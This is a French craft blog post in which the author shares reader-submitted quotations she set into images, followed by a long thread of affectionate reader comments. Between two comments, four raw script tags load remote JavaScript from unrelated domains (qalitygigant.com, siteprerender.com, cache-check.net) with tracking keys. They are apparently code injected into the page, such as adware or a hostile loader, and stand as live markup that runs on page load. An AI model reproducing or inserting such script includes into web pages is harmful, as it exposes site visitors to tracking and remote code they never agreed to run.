• Citations pour Vous de vous !

     

     

    Citations pour Vous de vous !

     

     

    J'espère que vous allez toutes bien....

     

    J'ai eu des déconnexions à répétition hier, alors je n'ai pas pu vous visiter ou répondre à vos mails... Je me rattraperai aujourd'hui !

     

    Vous vous souvenez, avant mes vacances, je vous avez proposé de me soumettre des citations, que vous aimiez particulièrement, pour que je les mette en image....animée ou pas !

     

    J'ai recommencé à en faire.... Il m'en reste quelques unes mais n'hésitez pas si le cœur vous en dit !

     

    En voici quelques unes.... Propositions de Patounette...

     

     

    Citations pour Vous de vous !

     

     

     

     

     

     

    Citations pour Vous de vous !

     

     

     

     

     

    Citations pour Vous de vous !

     

     

    ( Toutes les deux sont à retrouver dans la Rubrique "Citations"-"Esprit-Pensée" ICI )

    ( Pour la première, l'Indienne est à retrouver dans la Rubrique "Mes Tubes"-"Femmes" ICI )

     

     

     

     

     

    Citations pour Vous de vous !

     

     

    ( A Retrouver dans la Rubrique "Citations"-"Amour-Amitié" ICI )

     

     

     

     

    Citations pour Vous de vous !

     

     

     

     

    J'espère qu'elles vous plairont....

     

     

    Citations pour Vous de vous !

     

     

     

     

    Citations pour Vous de vous !

     

     

    ( A Retrouver dans la Rubrique "Jours"-"Vendredi"-"Automne" ICI )

    ( Décliné en "Bon Week-end" dans la Rubrique "Week-End"-"Automne" ICI )

    ( La Dame dans la Rubrique "Mes Tubes"-"Personnages dessin" ICI )

     

     

     

     

     


    Tags Tags : , , , , ,
  • Commentaires

    35
    Lundi 21 Septembre 2020 à 17:53

    Coucou ma belle amie, on a un beau soleil présentement avec 14 degrés mais on devrait avoir des températures plus chaudes cette semaine, pas de canicule ici, c'est vraiment l'automne. Bonne fin de journée, bisou rose tendresse !

    34
    Dimanche 20 Septembre 2020 à 21:52
    bibikafeine

    très belles mises en image de ces citations. bises

    33
    Dimanche 20 Septembre 2020 à 21:13

    Magnifique citations bisous .

    enfin retrouver mon ordinateur hi hi .

    32
    Dimanche 20 Septembre 2020 à 20:41
    De belles citations si joliment mises en valeur bravo Bisous Pierrette67
    31
    Dimanche 20 Septembre 2020 à 16:59

    Coucou Valie...Je viens de me servir,c'est si beau ...

    Les Couleurs de ton Blog sont superbes...j'adore cette saison.Pour en profiter ce sera difficile gardons le moral et faisons plaisir a nos Amies avec des petits mots réconfortants...Je pense bien à Toi.

    Bonne fin de journée de ce Dimanche.

    Plein de gros bisous.

    Je passerai régulièrement à nouveau...

    A bientôt.Merci à Toi*

    30
    Dimanche 20 Septembre 2020 à 09:12

    Ah j'adore quand tu fais ça.. l'image est toujours bien trouvée et bravo pour le choix des citations. Bon dimanche Valie. Bisous d'amitié.

    29
    Dimanche 20 Septembre 2020 à 09:11

    Coucou ma Valie.........Un grand merci pour ces superbes créations sur mes citations, elles sont géniales et j'adore ....

    Bonne journée et gros bisous

    Pat

    28
    Samedi 19 Septembre 2020 à 18:36

    de très belles citations bien mises en valeur par toi 

    bisous

    27
    Jacline-H-49
    Samedi 19 Septembre 2020 à 14:45

    Bonjour ma douce Valie,

    ça fait plaisir de voir que tu reprends les citations.

    Elles sont encore bien représentatives.

    Je les aime toutes mais une préférence tout de même pour l'amérindienne. Encore que, celle du soleil n'est pas mal comme citation.

    Tu sais tout mettre en valeur, je te félicite mon amie.

    Bonne journée de ce samedi et bon dimanche demain, pluie chez moi ce jour, mais le soleil arrive !!

    GROS BISOUS TENDRESSE de 

    Jacline

     

     

    26
    Elisabeth Marteen
    Vendredi 18 Septembre 2020 à 20:44
    De jolies citations superbement illustees. J'aime beaucoup la seconde.
    Bisous, bonne soirée.
    25
    Vendredi 18 Septembre 2020 à 19:58

    Bonsoir ma douce Valie

    Tu fais des créations magnifiques , celle avec l'indienne et superbe.

    J'espère que tu vas bien et je te souhaite une bonne soirée et un bon week-end

    gros bisous

    Janine

    24
    Vendredi 18 Septembre 2020 à 17:51

    Coucou ma belle amie, magnifiques créations pour insérer ces citations tellement véridiques. Passe un beau week-end, bisou rose tendresse !

    23
    Vendredi 18 Septembre 2020 à 16:54

    Merci pour ces citations que tu interprètes en images

    Bravo

    Bon week-end

    Bisous 

    22
    Jour de Mai
    Vendredi 18 Septembre 2020 à 15:59

    Coucou Valie, 

    J'adore et la mise en illustration de ces citations est très jolie. 

    Bravo à toi. 

    Mr Net te fait des misères, c'est parfois énervant mais hélas rien de sert de se faire du "mouron", les choses n'avancent pas plus. 

    Très belle fin d'après-midi et excellent week end. 

    Gros bisous ♥♥♥

    LN

    21
    Vendredi 18 Septembre 2020 à 15:44

    tres jolies ces citations

    bisous

    20
    Vendredi 18 Septembre 2020 à 15:21

     

    coucou Valie

    J'espère que tu vas bien , tes créations citation sont superbe. il fait encore beau et chaud pour un mois de septembre. je me fais une petite pause car en ce moment, je bosse sur la section hiver je cherche mes fonds, pour la création des cadres et créa, je te souhaite une excellente journée

    bisous Frane

    19
    Tite-C.
    Vendredi 18 Septembre 2020 à 14:47

    Passe une https://i.postimg.cc/BvYnVfhD/selena.gifchère Valie.

    https://i.postimg.cc/HknKtG7F/bisous-de-c-timbre-mamie-evy-selena.gif

    18
    Vendredi 18 Septembre 2020 à 14:20

    De belles citations et très belles mises en images!! Bravo à toi pour ce magnifique travail......

    Bisous et doux week-end

    17
    Vendredi 18 Septembre 2020 à 13:13

    Deux nouvelles magnifiques réas pour illustrer ces deux belles citations. Coup de cœur pour la 1ère !

    Bravo Valie !

    Bisous bisous !

    16
    marianne pirotte
    Vendredi 18 Septembre 2020 à 12:42

    Superbes citations, bravo !!

    Gros bisous

    Marianne

    15
    Vendredi 18 Septembre 2020 à 12:13
    lamanuelle25

    Superbes ces citations, merci pour ce travail d'équipe!!! Bisous Nadine

    14
    mamijojo77100
    Vendredi 18 Septembre 2020 à 12:13

    jolies citations belles et mises en images. pour ma part j emploi souvent la deuxieme expression qui est bien vraie..GBISOUS ET BON WE  joelle

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script>

    <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script>

    <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1600423878647" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>

    13
    Vendredi 18 Septembre 2020 à 11:58

    Bonjour

    je viens de découvrir ton blog qui est magnifique !! Que de belles choses et d idées ! J adore !! Merci à toi pour ce partage 

    à très bientôt 

    PS: tu dois être une informaticienne pour créer un aussi beau blog !!!

    12
    Vendredi 18 Septembre 2020 à 11:42

    des illustrations toujours bien trouvées pour ces citations ;

    Bonne journée ; bisous / Nicole

    11
    Vendredi 18 Septembre 2020 à 11:05

    j'adore et elles si joliment illustrées, bravo!! bisous bon week end

    10
    Jeannine (cristal24)
    Vendredi 18 Septembre 2020 à 10:21

    Très belles citations vraiment bien illustrées.

    Bravo à toi.

    Bonne fin de semaine. Bises.

    Jeannine

    9
    Vendredi 18 Septembre 2020 à 10:16
    Beau travail, merci. Bonne journée. Bises.
    8
    Vendredi 18 Septembre 2020 à 10:12

    C'est Superbe comme à ton habitude ma tite Valie !!

    Agréable journée, Doux Bisous.

    7
    Vendredi 18 Septembre 2020 à 10:03

    super blog 

    j'aime image 

    écoute le vent 

    nous le mistral en vaucluse 

    amitié

    6
    Vendredi 18 Septembre 2020 à 09:28
    Que du beau travail comme à ton habitude ! Passe une bonne journée journée sous notre beau soleil sarthois
    5
    Vendredi 18 Septembre 2020 à 09:13

    Moi j'aime bien tout ! Les citations, et tes décors ! Tu fais vraiment du bon boulot !!
    Bravo et Gros Bisous

     

    4
    Vendredi 18 Septembre 2020 à 08:47

     De belles citations  superbement  mises en  images   bravo  !!

    gros  bisous

    L’email a bien été copié
    <textarea id="cliquemailclipboardAreaToText"></textarea>
    3
    Vendredi 18 Septembre 2020 à 08:32
    Cc pas mal la 2 eme lol
    Bisous belle journée et bon week-end
    2
    Vendredi 18 Septembre 2020 à 08:15

    Ces deux citations sont encore une fois super et une belle mise en images ! 

    Bises

    Thaly

    1
    Vendredi 18 Septembre 2020 à 08:04

    Très jolies citations ma Valie, bravo à ces gentilles personnes de nous les soumettre , il fait encore très chaud chez nous mais ces temps ci jen ai pas la force d ouvrir mon PC alors je fais un petit passage pour te souhaiter une bonne fin de semaine et un excellent week end en famille ma douce, portez vous bien tous bisous tendresse et merci de tout

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :